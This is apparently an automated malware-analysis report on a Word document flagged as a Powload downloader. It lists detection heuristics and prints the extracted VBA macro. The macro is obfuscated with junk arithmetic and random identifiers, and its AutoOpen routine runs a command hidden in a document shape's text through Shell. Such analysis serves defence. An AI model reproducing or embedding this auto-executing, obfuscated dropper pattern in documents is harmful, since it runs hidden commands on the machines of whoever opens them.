MALICIOUS
252
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Powload-6827911-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6827911-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
_ .Shell(tZpBSOp, YiwKOUhdcE), iNwiZmJ) nIzlzLjRRwwfGPwUNqdpSL = (211213285 + Round(kVcrOljVzqooWtJv) * 28296831 - rUBEAFmoilwjUbcqB + (ipDjMbiPbKwTjhlBUMHf / Tan(WFZGwWQWMMfsjNPMKH))) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub autoopen() DwQka -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5035 bytes |
SHA-256: 81d7e5aa0ee5b497bfe91f5ebfb55a58e543603b11f240ae6a07b051be416b7e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
134 of 175 identifiers look randomly generated (e.g. 'olDfNfVtvkimNrnjXizKXEYw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VHFAFRowhP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub autoopen() DwQka End Sub Attribute VB_Name = "DUIGPqkX" Function DwQka() On Error Resume Next IOzpGdrzWMwYPmvwOwAbXQ = (61575601 + Round(UjzfoinsjifmztbzjMoa) * 166687881 - RhhArbMsQsFUVWiLJ + (YFohHJwUUDuLbiEESRwnmMf / Tan(RnhfYFTVDvBTbkZYDWGJzFQ))) QREMNVFMZwPUbRvPjZ = 54968547 ZPXiilJmQwNNqoMSurMhu = (234738427 + Round(bCJInfFQEUCmMowhYDL) * 233198629 - BKAiPwriihmqpv + (UcVGLjIsoBziwJoijAW / Tan(sJiYjOhamPwXsWMvhFY))) sRMcQSuZpCDpTVjLwz = 150569958 pOcRarrqzMmizp = (92621964 + Round(VPnUjRdlVwziqbRHiklczGWs) * 335476405 - rKjInAsHhoKzSXkrvirIzW + (izNDlwPtvVuaTCNJwpjudzhR / Tan(rFKsAqqVOEIZzHISu))) cYwRpiUtTQbShSvot = 298921295 loGplaIpKXEzvtYmTJDl = (151952967 + Round(fHjthpEjIBBjVqrCsUVwzSf) * 223335377 - OBUpEYzFuJzGrsSliOCv + (XivRQiPasNbBOSnjr / Tan(dBabjsvAcCLUDc))) PrTZXnpkfCwXFdZiCnKZup = 315166853 MJbOFrTLOoOHZcPYzmPl = (239098102 + Round(LWcbowlmPjpqdBPPfBRilvl) * 37470103 - tCEirYWtSwEmiDXZcYhS + (wNIiHNTGIPlWwutjHXISw / Tan(DKdAwuEJWDmuupww))) KDnJiTPfIisUAZAlnKwEG = 104616061 Set VQGNO = VHFAFRowhP.Shapes(qXCXJh + "FrXXBbPlWaco" + DravSWBXj) BjVbUYHYiiiJnYXjzcj = (288618690 + Round(absaNXVTQoNddfnCiBGQdVFj) * 251152949 - vhVzmaAdaEdAHBmFOtRfKsj + (UacbSEWIoVbowRCmdzEi / Tan(duFiYHLSGhCzqiLwZLW))) VMlZzGzqiCKoBFrjXwtwK = 278761034 ZTdXfuVAsFSkIZpPvLjTLwp = (148786727 + Round(ZwaSiDVfHfKjdtOG) * 334634703 - cwbpmMrqPFcfbiGKG + (viOCwFBuijSSRNMjMYlkMNb / Tan(nQDbEfZSmTKQBaBWoshIXz))) OTsSiZVihHZOjBZpzJAfzC = 315146659 QOjZBnWiihLoViSGSIFCAijO = (182120184 + Round(niAAcocRiJrGAzuPZ) * 80498221 - GdQillELKzifRzkzsd + (FWLDzIPMIFHkJWuVoXvP / Tan(XcSSwiZIQACluGwuZ))) aVYwGDOYIXcvcwOPi = 306270962 pCdRJuWzLObWIcYlLdaTzV = (333162951 + Round(AIviNIiNqnicBjr) * 80746834 - LobXAzYdoLOpImUDYQB + (olDfNfVtvkimNrnjXizKXEYw / Tan(YiAOYdPqNnalvJVcih))) hcbQznjqRrbjMG = 71859009 iTFiUQzNBAQqEGZuLXzMVHP = (225592457 + Round(VLpEqUnSatotjcCiMJkbOM) * 212729018 - nBUtFXXEXrzEIJLfcYiNl + (fuvdIziHZIfERp / Tan(uMDVkVodzaDwFwpiTwlVawcO))) ZQRqYDsVjiLarBfrQzD = 35591596 wzVZNmwHtYnoijlvYCnzmf = (41740816 + Round(zfvPXrObGpmOrzWRZHICjE) * 195912016 - TzHzwmDSshZirhjB + (LhttXEZfWafWDHuB / Tan(wXkRfUmUVJZnZsXHtVXkR))) vhRZLYvpZihHlMQsjNHZCuzr = 320544954 MZmGaBvjRzUtZmdkA = (216537239 + Round(iqWbURnSHzYwfPCdmkDF) * 68929527 - tzETQzQjjdFnZXqzS + (njnjtApdWIrAwbUTzYXBBo / Tan(YRurrqinpSOSbb))) EEdmcHsjjiSFaRaQ = 259155211 kNsaEtBVKElibvYJwNnaG = (170906443 + Round(aciwrBwnpcWadIOFkq) * 158358767 - dowCWHVqtdPiKsRzZzJUNQv + (FUvAhIDjiismic / Tan(jfFuMMrQkqRfmjDiMsw))) BMVIlajwcAfTzXZpHWjpNEKJ = 111427079 QawTvAvQhqlbwaVwE = (7062957 + Round(CdPQZLQQEjLbLzRhbNYM) * 56563000 - BqdAJVYjjGMUGoAKYHikq + (WPZifttkjoUUcZmYBvsX / Tan(FOqqcjRpQhYrUT))) afqinvZYAlLbXzGjr = 122703699 Const YiwKOUhdcE = 0 bJpdQlmvnNYLsiamEjriiAjV = (333880191 + Round(OICRVwARSoaYEF) * 54176244 - nGCGlqdFaBozPad + (iNWdtWscKaLlLjbmVa / Tan(ZSsSYfwrTIBCsLHt))) iiOROavLirutZBdoNDAmuzw = 317538526 iihWlJsjlIiGFIPERDJFf = (115039645 + Round(aGWZlwOitnaSCrUQFzHCJbtD) * 56151308 - ElTqwENiHPOkGnWZoTiqNN + (mEGXPmwNTQwrdPDqWFUjEBUs / Tan(fkmaYScrnjmpjwvJCv))) KvtJlcHksdtkjNCjBL = 255530771 LthiNlLoRzfnSM = (295693242 + Round(VmJUiVNqEImjNQwQ) * 56145889 - UZELrBbWzrbBfZkHWVjTU + (jrZEwbbBzOfksTFJuIsMVV / Tan(DdMzFtdkoNitMmnCA))) wsMWvhQBNaXaITKcWblcVHWd = 278843405 tZpBSOp = VQGNO.TextFrame.TextRange + jhfiE + sWHFsQX + NOFKi + LRXaqV + whZptFtR + ZTqJqSR + QcQDsI + oUpjHTAI + upkvfOOA + SLiJPCS cCCpRhFCwXzLCzQwSVNnQj = (66237813 + Round(NUwtVkUfpihZbv) * 55126517 - IYKbtjZOJZrcUHVtsCbzjM + (NDUVTRrVXNYfsZiGhujkv / Tan(rKiMohZTLFwqwXYKFwSEUPv))) dUJvuCzblUMJnHdKvDCS = 232236214 RcniSzHGbGDFszWVwVEsk = (332208448 + Round(cfVBiqpRstwMOtl) * 250628443 - ptTnpzVSvrAEAt + (STKzzwcQlpLMvnIbMjADqiUn / Tan(AiiwpMrAztuimoHMdhzd))) ZfnPnVAqGowXSzNuRwdTMv = 305665452 biSjTuVOYJZnJANwSHWojon = (318748418 + Round(tJJBJZwNYDXQQjqjmTEa) * 295453190 - LbEzljsKnuVAakM + (PjcakwpjCXjEtViW / Tan(ozhzKoNVOQcvPIFXZDUzSU))) lXwNDnQRLzNlnfOFv = 97598160 YJmSitMPwAwTzqTKiIPmM = (44804386 + Round(YQBvtKJjbUoaKVqlSQi) * 205454690 - AuYWtzMnUIVRhOBdwSEnUXz + (QJorWwVibkXWcZAL / Tan(sHLTIcGpIUwZrWduNFjKUQXm))) pwriAZRtqbQnrHjiCNcXIj = 90772892 jMlnOah = Array(ROYUUi, ZNaKhzwQv, WSsLw, Interaction _ _ _ _ _ _ _ _ .Shell(tZpBSOp, YiwKOUhdcE), iNwiZmJ) nIzlzLjRRwwfGPwUNqdpSL = (211213285 + Round(kVcrOljVzqooWtJv) * 28296831 - rUBEAFmoilwjUbcqB + (ipDjMbiPbKwTjhlBUMHf / Tan(WFZGwWQWMMfsjNPMKH))) WkicpKEQvSHQiVHLjia = 91659747 ipaAdzYHVQnjIll = (317709435 + Round(MBosXwWjcUamtj) * 251530093 - kLRvAspiULKNRLjY + (JwVSMGtDQBczUbj / Tan(UXaUADULJXMlJR))) lBdkkQtXEXsjrNjAj = 176094986 End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.